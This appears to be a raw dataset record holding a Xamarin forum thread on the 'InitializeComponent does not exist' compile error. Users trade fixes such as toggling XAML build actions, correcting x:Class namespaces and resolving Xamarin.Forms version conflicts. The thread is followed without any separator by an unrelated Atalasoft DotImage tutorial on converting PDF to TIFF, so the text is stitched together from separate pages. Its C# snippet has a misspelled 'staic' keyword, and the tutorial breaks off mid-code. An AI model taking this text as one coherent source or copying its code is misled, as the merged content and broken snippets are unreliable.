text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91 values | source stringclasses 1 value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
This is really strange and inconsistent. Sometimes it runs fine and sometimes I get the following error
'The name 'InitializeComponent' does not exist in the current context'
There is absolutely no change in code and project settings. Just sometimes it runs and sometimes it throws this compilation error. How to resolve this?
Answers
Clean and build anyway. Its a false positive.
I have tried that many times.It will run once and then it won't run with the error. How to resolve this?
Let's see the code for that. My guess is that there is no inheritance on the class.
for example:
public partial class HomePage : GenericPage
This is how it is inheriting
public partial class ResultPage : ContentPage
I would think that should be fine. That's about as vanilla as you can get.
Reboot the PC?
Double check the XAML of that page? If there is an issue in the XAML, that gets generated to code when you compile... If that generated code is screwed up then the partial class that is the code-behind would probably get squirrely.
tried all those options.
Don't know what to tell ya in that case. Its not systemic with Xamarin in general or everyone would be seeing the same thing.
@ClintStLaurent thanks. I hope Xamarin team gives some clear instruction.
Clear instruction... For what? You've got some bad code or markup someplace. Its a problem specific either to your installation or your solution: Not to everyone. So there's little anyone can tell you based on "I get an error".
Start with a new solution. Make NO CHANGES. Build it 10 times. Does it still happen?
Make a minor change to one line. Something that can't be screwed up like going from
int x = 10;to
int x = 20;just to force a re-compile. Build and run. Does it still fail. Do that same kind of minor change 10 times. Do any of them fail?
May be your files BuildActions changed
Please check your XAML file build action it should be EmbeddedResource
And c# file build action should be compile
Right click on files ----> properties then check the build action for both files
Thank you
Xamarin studio should tell clear error message. It is giving some error message that cannot be understood.Xamarin team needs to work on this.There is no bad code.It is simple and straightforward code.Even if there is an error then the compiler should tell what is the error as it happens in XCode or Android Studio.But these errors are meaningless and doesn't give any clue where the actual problem is.Team Xamarin needs to improve a lot.
You can stop right there. Xamarin Studio is end of life. Its out of date at this point. You probably want to update to Visual Studio. Otherwise you have no way to know if any problems you encounter are because of Xamarin Studio being out of date, or if its your code.
@ClintStLaurent Is there any official news that Xamarin Studio will be phased out?Please share with me.
Yeah - Months ago. At the Visual Studio 2017 release it was said in one of the presentations that Xamarin Studio wouldn't be receiving additional updates. A commentator interviewing some higher-up or another asked it point blank and got an equally direct answer.
We all kind of knew it would happen at one point or another. Its just good business sense. Why would a company continue to develop a second IDE when they already own Visual Studio? There is no reason to. Certainly no financial responsibility in doing so.
Yeah, update to Visual Studio, and as in any other update in this platform, get newer bugs.
One thing I learned is that one does not update anything in Xamarin unless necessary or you will get more problems.
anyone from Xamarin Support team please answer why am I getting this error.
Don't wait for it. You can fill a bug report, but I don't think you get any help there either.
I suggest you create a new project and copy everything little by little until you fix the problem. This error can mean basically anything.
This is how I fixed it: Clean your project, Rebuild it, change your XAML file properties (Build Action) from Embedded Resource to Compile, Rebuild your project (will throw errors), switch back your XAML file properties to Embedded Resource, Rebuild.
I have the same problem.
Tried to changing build action.
In the past it worked.
Now not!
I had this problem in Visual Studio 2017 too; it seemed to be an Intellisense-related problem. An actual build worked, and in the Error List window, if I selected "Build - Intellisense" or "Intellisense Only" it displayed the errors, but if I selected "Build Only" the errors went away in the Error List window.
I fixed it by following the steps MarioLpez suggested above; thank you for that.
Finally I found the problem of me.
The problem was XF versioning issue, an old dependency on referenced PCL (netstandard) needed old XF version
therefore old XF was pulled as a package , therefore the error on "'InitializeComponent' does not exist ".
The solution was to ReReference in the final project the new XF version (latest) thus activating the "nearest-wins" rule as here:
That worked for me!
Thanks that worked for me, too!
@VenkataSwamy, thanks for the correct input , it has solve my issue.
Yeah that's worked for me
Thank you.
Hi.
Tried the MarioLpez approach, this didi not work entirely. Next, tried, prishah's steps. Still no joy. So I then tried this one. Bingo!
Everything builds and I can run the project in the Simulator (unrelated, but just in case, I was using jamesmontemagno's IsRefreshing app from github).
This problem happened to me when I bind "IsEnabled" two times by mistake for "switch" like this:
Change ContentPage properties to :
I was attempting to see what upgrading to the newest forms would do to my project...as always it was a disaster so I opted to restore from TFS and this problem happened. It's clearly not a code issue as I'm restoring every bit of code to a known working condition. MarioLpez's approach resolved my issue. I still have no idea what the real problem was, which is par for the course with Xamarin.
I just came to this and the problem was that after renaming the .cs file, I forgot to change the Class in the .xaml file.
Hi, I managed to fix the same issue by these steps:
the problem is x:Class=Solution.Name have to be the same to class name.
Thanks @carloslzp I had changed the page name but the x:class was still Page1
This is always because of your xaml. Usually namespace declaration in the xaml.
I have this. I know it is something to do with the .cs and .xaml files having something wrong between them as i have fixed it in the past.
As it is one of those errors with a number of different causes, could the team do something to break it down a bit? Which keyword or token doesn't it like?
I'm pretty sure the same process that I outline here still works:
@shaunpryszlak said:
Unless you are doing something really weird to make your UI this shouldn't be the case. The XAML and xaml.cs files are made together and match. So if they're out of sync its something you did specifically like a rename of one but not the other. Sometimes global find & replace can bite you.
If that's not the case... If you didn't do something to throw them out of sync and screw up their naming try the standard clean/close/open/build process above.
Today I have also got this. No clean-up worked for me (Delete Bin/obj etc).
The issue was with my Xaml where x:Class was pointing to wrong namespace. Failing to this, it throws the above mentioned exception (InitializeComponent doesn't exist). This usually happens if you're doing copy-paste of Xaml markup between solutions and it doesn't throw the right exception. Hope it helps to someone. | https://forums.xamarin.com/discussion/comment/282951/ | CC-MAIN-2019-51 | refinedweb | 1,382 | 76.22 |
DragonBoard: How to Access GPIOs Using Python
Introduction: DragonBoard: How to Access GPIOs Using Python
The DragonBoard™ 410c is the first development board based on a Qualcomm® Snapdragon™ 400 series processor. It features advanced processing power, Wi-Fi, Bluetooth connectivity, and GPS, all packed into a board the size of a credit card. Based on the 64-bit capable Snapdragon 410E.
In this tutorial you will learn how to access the GPIO of the boards using Python Language from Linux GPIO.
List of Material:
1 - Dragonboard410c
1 - 96Boards sensors board
1- Grove Button
1 - Grove LED
Step 1: Installing the Python
First, update the package index.
$ sudo apt-get update
Now, you can install the Python 2.7 with the following command:
$ sudo apt-get install python2.7
Step 2: Download Source Code
Download the source code below:
Step 3: Dragonboard GPIO Pin Mappings
This picture shows DragonBoard GPIO pins mappings. In the source code to access a GPIO pin, call function for a specific GPIO pin.
For example:
def getPin23(self):
return self.getPin(36)
This method will give access to the GPIO pin 23.
Step 4: Set GPIO Direction.
In file GPIOLibray.py there are functions to set GPIO direction.
Set GPIO pin as output:
def out(self):
self.setDirection("out")
Set GPIO pin as input:
def input(self):
self.setDirection("in")
To get GPIO direction, call function "getDirection()"
Step 5: Read and Write Values on GPIO
In the GPIOLibray.py there are function to read and write values on GPIO pin.
Set GPIO pin as High level:
def high(self):
self.setValue(1)
Set GPIO as Low level:
def low(self):
self.setValue(0)
To read value from GPIO, call function getValue();
Step 6: Release Access to the GPIO
After using GPIO pin, it is necessary release access to the GPIO pin.
Call function cleanup() in GPIOLibrary.py to remove access of pin.
def cleanup(self):
for pin in self.GPIOList:
pin.input()
pin.closePin()
self.GPIOList = []
The "closePin()" function will disable access to the GPIO and remove the corresponding directory.
Step 7: Blink Led After Pressing Button
The blink_led.py runs an example that blink led after pressing button during 20 seconds.
In this example we are accessing pin 27 for blink led and pin 29 to read button status.
After 20 seconds, both GPIO's are released.
To run, type the command:
$ sudo python blink_led.py
Step 8: References......... | http://www.instructables.com/id/DragonBoard-How-to-Access-GPIOs-Using-Python/ | CC-MAIN-2017-39 | refinedweb | 404 | 67.76 |
A type.
Gets an immediate base interface of this class, if any.
Gets an immediate base type of this type, if any.
Gets a member of this type, if any.
Gets an immediate subtype of this type, if any.
Gets the immediate base class of this class, if any.
Gets an index for implicit conversions. A type can be converted to another numeric type of a higher index.
Gets the containing type of this type, if any.
Gets the location of this element.
Gets the name of this element.
Gets the namespace directly containing this type, if any.
Gets the parent of this type container, if any.
Gets the unbound generic type of this type, or this if the type is already unbound.
this
Gets the machine type used to store this type.
Holds if this element has the qualified name qualifier.name.
qualifier
name
Holds if this type is a class.
Holds if this type is an enum.
enum
Holds if this type is an interface.
Holds if this type is private.
Holds if this type is public.
Holds if this type is a member of the System namespace and has the name name. This is the same as getQualifiedName() = "System.<name>", but is faster to compute.
System
getQualifiedName() = "System.<name>"
Gets a textual representation of this element. an attribute (for example [Obsolete]) of this declaration, if any.
[Obsolete]
Gets the C# declaration corresponding to this CIL declaration, if any. Note that this is only for source/unconstructed declarations.
Gets the file containing this element.
Gets a unique string label for this element.
Gets the “language” of this program element, as defined by the extension of the filename. For example, C# has language “cs”, and Visual Basic has language “vb”.
Gets the fully qualified name of this element, for example the fully qualified name of M on line 3 is N.C.M in
M
N.C.M
Gets the unbound version of this declaration.
Gets the name of this type without additional syntax such as [], *, or <...>.
[]
*
<...>
Holds if this element has name ‘name’.
Holds if this element has qualified name qualifiedName, for example System.Console.WriteLine.
qualifiedName
System.Console.WriteLine
Holds if this declaration is a source declaration.
Gets the full textual representation of this element, including type information. | https://help.semmle.com/qldoc/csharp/semmle/code/cil/Type.qll/type.Type$Type.html | CC-MAIN-2019-09 | refinedweb | 381 | 70.6 |
What is the fastest way to use the mouse in direct vesa mode. (No freebasic fbgfx graphic commands)
Do using interrupts, going from protected mode to real mode and back, slow things down?
Direct vesa:Fastest way to use the mouse?
DOS specific questions.
5 posts • Page 1 of 1
Re: Direct vesa:Fastest way to use the mouse?
For real-mode DOS and QuickBASIC one method that worked well for me was to set up a mouse driver interrupt sub that stored the mouse status in a QuickBASIC global structure, eliminating the need to periodically call the mouse driver. Once installed, the mouse driver called the interrupt sub for any of the defined conditions (events), the interrupt sub updated the QuickBASIC global structure, and the QuickBASIC app could simply read the mouse status from the structure members. Here are the relavant parts of the assembly module source:
The missing file test.asm is not necessary for your purposes, but by way of explaining what it was here is the start of the header:.
Code: Select all
;===================================================
; This is the MASM 6+ source code for a QuickBASIC
; Mouse procedure library. Beyond providing wrappers
; for a few of the most common mouse functions, it
; includes a MouseInit procedure that initializes
; the mouse driver and installs a mouse driver
; interrupt subroutine that maintains the current
; mouse status in a QuickBASIC global variable.
;
; The QuickBASIC global variable must be of type
; MouseType, and the segment and offset addresses
; of the variable must be passed in the first call
; to the MouseInit procedure. The button states
; are TRUE (-1) if the button is pressed, or FALSE
; (0) if the button is not pressed. The event mask
; indicates what type of mouse event triggered the
; most recent interrupt. The possible events are a
; position change or a press or release of the
; left or right button.
;
; TYPE MouseType
; x AS INTEGER ' Cursor X coordinate
; y AS INTEGER ' Cursor Y coordinate
; left AS INTEGER ' Left button state
; right AS INTEGER ' Right button state
; event AS INTEGER ' Event mask
; END TYPE
; DIM SHARED mouse AS MouseType
;
; These constants are used to interpret the event
; mask. The assigned values are the value of the
; corresponding bit in the event mask, so an
; event can be detected by ANDing the appropriate
; constant with the event mask.
; CONST POSITION = 1
; CONST LPRESS = 2
; CONST LRELEASE = 4
; CONST RPRESS = 8
; CONST RRELEASE = 16
;
; For the range of video modes that are supported
; by QuickBASIC, the interrupt subroutine and the
; MouseSetPosition procedure automatically
; translate between mouse driver virtual screen
; coordinates and physical screen coordinates,
; so as viewed from the QuickBASIC module all
; coordinates are physical screen coordinates.
; For the text modes, the x coordinate will be
; the base 1 column position and the y coordinate
; will be the base 1 row position.
;
; For uniformity, all of the procedures that take
; arguments expect the arguments to be passed by
; reference. "Pass by reference" is the QB default
; and it means that the value passed is the address
; of the argument in the QB default data segment.
; Within the procedures, the arguments, which as
; viewed from the procedure are properly termed
; "parameters", are accessed by first loading the
; address of the parameter into a base or index
; register and then by using a register indirect
; form of the instruction that accesses the
; parameter. For example, to load the value of a
; parameter named varPtr into AX:
;
; mov bx,varPtr
; mov ax,[bx]
;
; QB procedures are always called with a far call
; and the procedures must preserve the direction
; flag and the BP, DI, SI, DS, and SS registers.
; The BASIC calling conventions require that the
; arguments be pushed onto the stack in left to
; right order as they appear in the procedure
; definition, and that the called procedure remove
; the arguments from the stack. One significant
; advantage of using MASM for mixed language
; programming is that you can specify a language
; type in the .MODEL directive and MASM will
; automatically generate the code that is required
; to properly implement the calling conventions.
; For example, for the RET instruction in the
; procedures MASM knows to encode a far return,
; and for the procedures that take arguments, MASM
; knows to add an operand to the RET instruction
; that will cause the processor to add an
; appropriate value to SP after the procedure has
; returned to the caller.
;===================================================
; Declare a structure to use as a template when
; accessing the mouse status variable.
MouseType struct
x WORD ?
y WORD ?
left WORD ?
right WORD ?
event WORD ?
MouseType ends
; This prototype establishes the call interface for
; the B_OnExit procedure (so MASM will know how to
; call it) and effectively generates an external
; declaration in this module (so MASM will know that
; the procedure is defined in another module).
B_OnExit proto far basic :far ptr
; This is the normal model specification for QB.
.model medium,basic
; Enable assembly of the 186 instruction set (the
; minimum processor that will support an immediate
; (constant) operand for a push instruction).
.186
; Start a near data segment. The linker will combine
; this segment with the QB default data segment.
.data
; Allocate a flag variable to lock out multiple
; calls to MouseInit. The name avoids the MASM
; reserved word "finit".
f_init dw 0
; Define screen and cursor masks for a crosshair
; cursor. The cursor defintion is within this
; module rather than being passed as a parameter
; simply because defining the cursor with binary
; numbers is much easier than defining it with
; hex numbers.
;
; Note that this cursor will not work correctly
; for SCREEN 1, and that the aspect ratio will
; be significantly off for the 640x200 modes.
;
; For the QB graphics modes other than SCREEN 1,
; the mouse driver will AND the screen mask bits
; with the corresponding screen pixel bits and
; XOR the result with the cursor mask. In truth
; table form:
;
; screen mask cursor mask resulting screen bit
; 0 0 0
; 0 1 1
; 1 0 unchanged
; 1 1 inverted
;
; Note that the masks bits are expanded as
; necessary for the current graphics mode.
; For example, for mode 13h (SCREEN 13) each
; mask bit is expanded to 8 bits and these
; bits are then combined with the 8 attribute
; bits for the corresponding screen pixel.
;0123456701234567
cross dw 1111111111111111b ;0
dw 1111111111111111b ;1
dw 1111111011111111b ;2
dw 1111111011111111b ;3
dw 1111111011111111b ;4
dw 1111111011111111b ;5
dw 1111111111111111b ;6
dw 0000001110000001b ;7
dw 1111111111111111b ;0
dw 1111111011111111b ;1
dw 1111111011111111b ;2
dw 1111111011111111b ;3
dw 1111111011111111b ;4
dw 1111111111111111b ;5
dw 1111111111111111b ;6
dw 1111111111111111b ;7
dw 0000000000000000b ;0
dw 0000000000000000b ;1
dw 0000000100000000b ;2
dw 0000000100000000b ;3
dw 0000000100000000b ;4
dw 0000000100000000b ;5
dw 0000000000000000b ;6
dw 1111110001111110b ;7
dw 0000000000000000b ;0
dw 0000000100000000b ;1
dw 0000000100000000b ;2
dw 0000000100000000b ;3
dw 0000000100000000b ;4
dw 0000000000000000b ;5
dw 0000000000000000b ;6
dw 0000000000000000b ;7
; Start a (far) code segment.
.code
; This include directive includes TEST.ASM in this
; file, effectively making it part of this file.
include test.asm
;===================================================
; Allocate a variable to store the far address of
; the mouse status variable, and a lookup table of
; shift and base adjust values indexed by BIOS video
; mode, that will be used to translate between mouse
; driver virtual screen coordinates and physical
; screen coordinates. These variables need to be in
; the code segment because they must be accessed
; from the interrupt subroutine, and when the mouse
; driver calls the subroutine the only segment
; register with a known value is CS.
statusVarPtr dd 0
; To allow the table to be indexed by the BIOS video
; mode the table must include all mode numbers from
; 0 to 13h, even though several of the included
; modes have no corresponding QB SCREEN mode and
; others are not supported on the typical PC. Each
; element consists of an x shift word, a y shift
; word, a base adjust word, and a pad word that is
; included to simplify table indexing. The base
; adjust value is 1 for the text modes and 0 for
; the graphic modes. Aligning the table on a word
; boundary minimizes the time required to access
; the table.
align 2
luTable dw 4,3,1,0 ; 0
dw 4,3,1,0 ; 1 (SCREEN 0, 40 column)
dw 3,3,1,0 ; 2
dw 3,3,1,0 ; 3 (SCREEN 0, 80 column)
dw 1,0,0,0 ; 4 (SCREEN 1)
dw 1,0,0,0 ; 5
dw 0,0,0,0 ; 6 (SCREEN 2)
dw 3,3,1,0 ; 7 (SCREEN 0, monochrome only)
dw 2,0,0,0 ; 8 PCjr only
dw 0,0,0,0 ; 9 PCjr only
dw 0,0,0,0 ; A PCjr only
dw 0,0,0,0 ; B EGA BIOS internal only
dw 0,0,0,0 ; C EGA BIOS internal only
dw 1,0,0,0 ; D (SCREEN 7)
dw 0,0,0,0 ; E (SCREEN 8)
dw 0,0,0,0 ; F (SCREEN 10)
dw 0,0,0,0 ; 10 (SCREEN 9)
dw 0,0,0,0 ; 11 (SCREEN 11)
dw 0,0,0,0 ; 12 (SCREEN 12)
dw 1,0,0,0 ; 13 (SCREEN 13)
;===================================================
; The following procedure declarations use the
; distance (far) and langtype (basic) from the
; .MODEL directive, and default to PUBLIC
; visibility.
;===================================================
; This proc calls the mouse driver Mouse Reset and
; Status function to reset the mouse driver to clear
; the interrupt subroutine call mask, which causes
; the mouse driver to cease calling the interrupt
; subroutine.
; This declaration must be placed before the
; reference to it in the MouseInit procedure.
;===================================================
TermProc proc
xor ax,ax
int 33h
ret
TermProc endp
;===================================================
; This proc checks for a mouse driver, resets it,
; saves the segment and offset addresses of the
; global status variable, installs the interrupt
; subroutine, and calls the B_OnExit routine to log
; a termination procedure that will automatically
; disable the interrupt subroutine when the program
; terminates. It returns non-zero for success, or
; zero for failure. The first call sets a flag that
; locks out subsequent calls.
;===================================================
MouseInit proc varSeg:WORD,varPtr:WORD
; Lock out subseqent calls.
.IF f_init != 0
xor ax,ax
ret
.ENDIF
mov f_init,-1
; Check for a mouse driver.
; Use the DOS Get Interrupt Vector function
; to get the interrupt 33h vector. If the
; segment address is zero, then the mouse
; driver is not installed.
mov ax,3533h
int 21h
mov ax,es
.IF ax == 0
ret
.ENDIF
; Attempt to reset the mouse driver. If the
; reset fails then the mouse driver is not
; installed.
xor ax,ax
int 33h
.IF ax == 0
ret
.ENDIF
; Save the address of the mouse status variable.
mov bx,varPtr
mov ax,[bx]
mov word ptr cs:statusVarPtr,ax
mov bx,varSeg
mov ax,[bx]
mov word ptr cs:statusVarPtr+2,ax
; Install the interrupt subroutine.
mov ax,12
; This condition mask specifies that an
; interrupt be generated for any of the
; defined conditions.
mov cx,11111b
push cs
pop es
mov dx,OFFSET InterruptSub
int 33h
; Register the termination routine.
; The arguments must be pushed onto the stack
; as per the basic calling convention before
; calling the routine.
push cs
push OFFSET TermProc
call B_OnExit
; Return whatever B_OnExit returned.
ret
MouseInit endp
;===================================================
; This proc is the interrupt subroutine. The mouse
; driver will call it for each mouse interrupt.
;
; The local variables allow temporary values to be
; stored on the stack in named locations.
;===================================================
align 2
InterruptSub proc
LOCAL xShift:WORD,yShift:WORD,baseAdjust:WORD
; Preserve DS before changing it because the
; mouse driver probably will not expect it to
; change.
push ds
; Preserve BX before changing it because it
; contains the button status.
push bx
; Get the video mode from the BIOS data area.
mov bx,40h
mov ds,bx
mov bx,49h
mov bx,[bx]
; Because the mode is actually stored as a
; byte and we are reading a word, and because
; bit 7 of the byte may or may not be set
; depending on whether or not the display
; memory was erased during the most recent
; mode set, we need to discard the upper 9
; bits of BX.
and bx,1111111b
; Get the corresponding x and y shift and
; base adjust values and store them in
; local variables. BX must first be scaled by
; the size of the table elements (BX=BX*8).
shl bx,3
; For instructions that take two operands,
; only one can be a memory operand. The push-
; pop sequences are used to perform a memory
; to memory move without involving a scratch
; register. Local variables can be accessed
; without a segment override because they are
; allocated from the stack, so the POP
; instructions reference BP (for example,
; "pop xShift" is encoded as "pop [bp-2]"),
; so the processor automatically uses SS.
push cs:[luTable+bx]
pop xShift
push cs:[luTable+bx+2]
pop yShift
push cs:[luTable+bx+4]
pop baseAdjust
; Load the status variable address into DS:BX.
mov bx,word ptr cs:[statusVarPtr]
mov ds,word ptr cs:[statusVarPtr+2]
; This assume informs MASM that BX contains
; a pointer to a variable of MouseType, so
; it will know what the following references
; to [bx].elementname mean:
ASSUME bx:ptr MouseType
; Store the event mask in the status variable.
mov [bx].event,ax
; We are Finished with the value in AX so pop
; the preserved button status into it.
pop ax
; Store the button status in the status
; variable. Bit0 of the button status will
; be set if the left mouse button is pressed
; and bit1 if the right mouse button is
; pressed. In the MASM 6+ High Level syntax
; "&" is the bit test operator, which returns
; true if the bit with the specified "place"
; value is set.
.IF ax & 1
mov [bx].left,-1
.ELSE
mov [bx].left,0
.ENDIF
.IF ax & 2
mov [bx].right,-1
.ELSE
mov [bx].right,0
.ENDIF
; Convert the virtual screen coordinates
; of the mouse cursor to physical screen
; coordinates and store the results in
; the status variable.
mov ax,cx
mov cx,xShift
shr ax,cl
add ax,baseAdjust
mov [bx].x,ax
mov ax,dx
mov cx,yShift
shr ax,cl
add ax,baseAdjust
mov [bx].y,ax
; Remove the assumption for BX.
ASSUME bx:NOTHING
; Recover DS.
pop ds
ret
InterruptSub endp
Snip…
The missing file test.asm is not necessary for your purposes, but by way of explaining what it was here is the start of the header:
Code: Select all
; This file contains a procedure that performs a
; measurement of the number of clock cycles the
; interrupt subroutine takes to execute. To use the
; procedure, include this file in MOUSELIB.ASM
;
; The purpose of the measurement was to ensure that,
; in the worst case, the interrupt subroutine would
; not consume an unreasonable amount of processor
; time..
Re: Direct vesa:Fastest way to use the mouse?
How do you use the Allocate Real Mode Call-Back Address function to call a protected mode subroutine?
Re: Direct vesa:Fastest way to use the mouse?
Do using interrupts, going from protected mode to real mode and back, slow things down?
Yes, there is a surprising amount of overhead involved.
This is a FB-DOS version of the newer cycle count macros (counter.bas):
Code: Select all
''=============================================================================
dim shared as longint counter_cycles
dim shared as integer _counter_loopcount_, _counter_loopcounter_
#macro COUNTER_BEGIN( loop_count )
_counter_loopcount_ = loop_count
_counter_loopcounter_ = _counter_loopcount_
asm
xor eax, eax
cpuid '' serialize
rdtsc '' get reference loop start count
push edx '' preserve msd (most significant dword)
push eax '' preserve lsd
xor eax, eax
cpuid '' serialize
.balign 16
0: '' start of reference loop
sub DWORD PTR _counter_loopcounter_, 1
jnz 0b '' end of reference loop
xor eax, eax
cpuid '' serialize
rdtsc '' get reference loop end count
pop ecx '' recover lsd of start count
sub eax, ecx '' calc lsd of reference loop count
pop ecx '' recover msd of start count
sbb edx, ecx '' calc msd of reference loop count
push edx '' preserve msd of reference loop count
push eax '' preserve lsd of reference loop count
xor eax, eax
cpuid '' serialize
rdtsc '' get test loop start count
push edx '' preserve msd
push eax '' preserve lsd
end asm
_counter_loopcounter_ = _counter_loopcount_
asm
xor eax, eax
cpuid '' serialize
.balign 16
1: '' start of test loop
end asm
#endmacro
''=============================================================================
#macro COUNTER_END()
asm
sub DWORD PTR _counter_loopcounter_, 1
jnz 1b '' end of test loop
xor eax, eax
cpuid '' serialize
rdtsc
pop ecx '' recover lsd of start count
sub eax, ecx '' calc lsd of test loop count
pop ecx '' recover msd of start count
sbb edx, ecx '' calc msd of test loop count
pop ecx '' recover lsd of reference loop count
sub eax, ecx '' calc lsd of corrected loop count
pop ecx '' recover msd of reference loop count
sbb edx, ecx '' calc msd of corrected loop count
mov DWORD PTR [counter_cycles], eax
mov DWORD PTR [counter_cycles+4], edx
end asm
counter_cycles /= _counter_loopcount_
#endmacro
''=============================================================================
To get an accurate value for the overhead of a RM software interrupt called from PM we would ideally need an interrupt where the handler consisted of an IRET instruction, so it would simply return from the interrupt. While this is doable, in the interest of keeping it simple the code below calls an interrupt where the handler simply reads a word from the BIOS data area and returns it in AX. The code for the handler should look something like this:
Code: Select all
jmp handler
...
handler:
push ds
mov ds, cs:[xxxx]
mov ax, ds:[0010]
pop ds
iret
And excluding the IRET it should execute in some small number of clock cycles.
Code: Select all
#include "counter.bas"
sleep 5000
''-----------------------------------------------------------
'' Disable the maskable interrupts so the system timer tick,
'' keyboard interrupt, etc will not interfere with the cycle
'' count code.
''-----------------------------------------------------------
asm cli
for i as integer = 1 to 6
COUNTER_BEGIN( 100 )
COUNTER_END()
print counter_cycles
COUNTER_BEGIN( 100 )
asm int 0x11
COUNTER_END()
print counter_cycles
asm sti
sleep
Results running on a P2 under MS-DOS 6.22 with HDPMI and CWSDPMI:
Code: Select all
HDPMI:
0
2112
0
2110
0
2109
0
2110
0
2110
0
2110
CWSDPMI:
0
4665
0
4653
0
4667
0
4673
0
4672
0
4651
The results running on the same system under Window ME were very close to the HDPMI results.
Results with the Windows XP NTVDM:
Code: Select all
-1
12768
0
12653
0
12688
0
12738
0
12645
0
12678
The method that I suggested above would eliminate the need for all but a few of the software interrupts, but as with most hardware devices there would still be hardware interrupts going on, and it is the mouse hardware interrupts that trigger the calls to the mouse driver interrupt sub. All of the mice that I have tested were generating hardware interrupts at a rate of 200 per second. IIRC the maximum rate is 400 interrupts per second. When polling the mouse driver with software interrupts, depending on the structure of your program loop, you could be generating many thousands of interrupts per second.
How do you use the Allocate Real Mode Call-Back Address function to call a protected mode subroutine?
I have not tried yet, but I expect that it will not be difficult. Which VESA modes do you expect to be using?
Re: Direct vesa:Fastest way to use the mouse?
Vesa LBF mode 101h, 640x480 8 bit color.
5 posts • Page 1 of 1
Who is online
Users browsing this forum: No registered users and 1 guest | https://www.freebasic.net/forum/viewtopic.php?f=4&t=21331&p=188745 | CC-MAIN-2019-51 | refinedweb | 3,221 | 65.05 |
This is the sixth post in a multi-part series about how you can perform complex streaming analytics using Apache Spark.
Traditionally, when people think about streaming, terms such as “real-time,” “24/7,” or “always on” come to mind. You may have cases where data only arrives at fixed intervals. That is, data appears every hour or once a day. For these use cases, it is still beneficial to perform incremental.
Triggers are specified when you start your streams.
# Load your Streaming DataFrame sdf = spark.readStream.load(path="/in/path", format="json", schema=my_schema) # Perform transformations and then write… sdf.writeStream.trigger(once=True).start(path="/out/path", format="parquet")
import org.apache.spark.sql.streaming.Trigger // Load your Streaming DataFrame val sdf = spark.readStream.format("json").schema(my_schema).load("/in/path") // Perform transformations and then write… sdf.writeStream.trigger(Trigger.Once).format("parquet").start("/out/path")
Why Streaming and RunOnce is Better than Batch
You may ask, how is this different than simply running a batch job? Let’s go over the benefits of running Structured Streaming over a batch job.
Bookkeeping
When you’re running a batch job that performs incremental updates, you generally have to deal with figuring out what data is new, what you should process, and what you should not. Structured Streaming already does all this for you. In writing general streaming applications, you should only care about the business logic, and not the low-level bookkeeping.
Table Level Atomicity
The most important feature of a big data processing engine is how it can tolerate faults and failures. The ETL jobs may (in practice, often will) fail. If your job fails, then you need to ensure that the output of your job should be cleaned up, otherwise you will end up with duplicate or garbage data after the next successful run of your job.
While using Structured Streaming to write out a file-based table, Structured Streaming commits all files created by the job to a log after each successful trigger. When Spark reads back the table, it uses this log to figure out which files are valid. This ensures that garbage introduced by failures are not consumed by downstream applications.
Stateful Operations Across Runs
If your data pipeline has the possibility of generating duplicate records, but you would like exactly once semantics, how do you achieve that with a batch workload? With Structured Streaming, it’s as easy as setting a watermark and using
dropDuplicates(). By configuring the watermark long enough to encompass several runs of your streaming job, you will make sure that you don’t get duplicate data across runs.
Cost Savings
Running a 24/7 streaming job is a costly ordeal. You may have use cases where latency of hours is acceptable, or data comes in hourly or daily. To get all the benefits of Structured Streaming described above, you may think you need to keep a cluster up and running all the time. But now, with the “execute once” trigger, you don’t need to!
At Databricks, we had a two stage data pipeline, consisting of one incremental job that would make the latest data available, and one job at the end of the day that processed the whole day’s worth of data, performed de-duplication, and overwrote the output of the incremental job. The second job would use considerably larger resources than the first job (4x), and would run much longer as well (3x). We were able to get rid of the second job in many of our pipelines that amounted to a 10x total cost savings. We were also able to clean up a lot of code in our codebase with the new execute once trigger. Those are cost savings that makes both financial and engineering managers happy!
Scheduling Runs with Databricks
Databricks’ Jobs scheduler allows users to schedule production jobs with a few simple clicks. Jobs scheduler is ideal for scheduling Structured Streaming jobs that run with the execute once trigger.
At Databricks, we use the Jobs scheduler to run all of our production jobs. As engineers, we ensure that the business logic within our ETL job is well tested. We upload our code to Databricks as a library, and we set up notebooks to set the configurations for the ETL job such as the input file directory. The rest is up to Databricks to manage clusters, schedule and execute the jobs, and Structured Streaming to figure out which files are new, and process incoming data. The end result is an end-to-end — from data origin to data warehouse, not only within Spark — exactly once data pipeline. Check out our documentation on how to best run Structured Streaming with Jobs.
Summary
In this blog post we introduced the new “execute once” trigger for Structured Streaming. While the execute once trigger resembles running a batch job, we discussed all the benefits it has over the batch job approach, specifically:
- Managing all the bookkeeping of what data to process
- Providing table level atomicity for ETL jobs to a file store
- Ensuring stateful operations across runs of the job, which allow for easy de-duplication
In addition to all these benefits over batch processing, you also get the cost savings of not having an idle 24/7 cluster up and running for an irregular streaming job. The best of both worlds for batch and streaming processing are now under your fingertips.
Try Structured Streaming today in Databricks by signing up for a 14-day free trial .
Other parts of this blog series explain other benefits as well:
-
- Running Streaming Jobs Once a Day For 10x Cost Savings
| https://databricks.com/blog/2017/05/22/running-streaming-jobs-day-10x-cost-savings.html | CC-MAIN-2018-30 | refinedweb | 940 | 60.85 |
1-781-743-2119 ext 2 Chat
Note: The PdfDecoder class is part of our PdfReader (Formerly called PdfRasterizer) module, which is an add-on to DotImage. To use this class, you must add Atalasoft.dotImage.PdfReader.dll as a reference to your project, and you will need a license file for this module. You can request an evaluation license file for this module using the DotImage Activation Wizard.
You will also want to add a PdfDecoder to your RegisteredDecoders collection in a static constructor for your class:
[C#]
staic MyClass()
{
RegisteredDecoders.Decoders.Add(new PdfDecoder() { Resolution = 200 });
}
[VB.NET]
Shared Sub New
RegisteredDecoders.Decoders.Add(New PdfDecoder() With {.Resolution = 200})
End Sub
Also, we have a complete, working PDF to TIFF demo and a complete, working TIFF to PDF Demo available which implement these techniques.
A common task that comes accross in the document management world is converting from one file format to another. The two most commonly used formats for digital document images are PDF and TIFF. This task may confuse DotImage developer's because the PDF and TIFF codecs function slightly different from each other. Here I will explain the different approaches to this problem. First, I'll start by explaining the simple case, PDF to TIFF.
There are three possible to save a TIFF file in DotImage; The most memory efficient is demonstrated in the PDF to TIFF demo in our demo gallery. It uses a class called FileSystemImageSource which is passed directly to the PdfEncoder.Save method (along with a stream to save to)
[c#]
TiffEncoder enc = new TiffEncoder();
using (FileStream fs = new FileStream("pathToSaveTo", FileMode.OpenOrCreate))
using (FileSystemImageSource fsis = new FileSystemImageSource("PathToSourceTiff", true))
{
enc.Save(fs, fsis, null);
}
Dim enc As New TiffEncoder()
